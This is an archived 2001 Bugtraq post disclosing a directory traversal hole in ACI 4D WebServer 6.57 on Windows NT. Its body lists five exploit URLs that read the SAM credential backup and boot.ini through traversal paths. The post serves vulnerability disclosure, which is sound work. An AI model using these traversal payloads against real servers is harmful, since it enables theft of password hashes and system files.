[22329] in bugtraq
ACI 4D WebServer Directory traversal.
daemon@ATHENA.MIT.EDU (KRFinisterre@checkfree.com)
Mon Aug 20 14:03:25 2001
To: bugtraq@security-focus.com
Message-ID: <OF7F14F084.50BEED60-ON85256AAE.00511CCC@ckfr.com>
From: KRFinisterre@checkfree.com
Date: Mon, 20 Aug 2001 10:51:00 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM
-----
KF <dotslash@snosoft.com>
Sent by: To: sales@4D.com, recon@snosoft.com
elguapo@clmboh1-smtp3.colum cc:
bus.rr.com Subject: I have found a security hole in your product...
08/18/2001 09:39 PM
vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57 , others?
This directory transversal hole seems to work on
ACI 4d webserver running on the NT platform. I would imagine
exploitation on a macos box would be similar but would require
the proper mac filesystem path to the file you wish to view.
Server: ACI-4D/6.57
Http://host + one of the following urls.
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
-KF
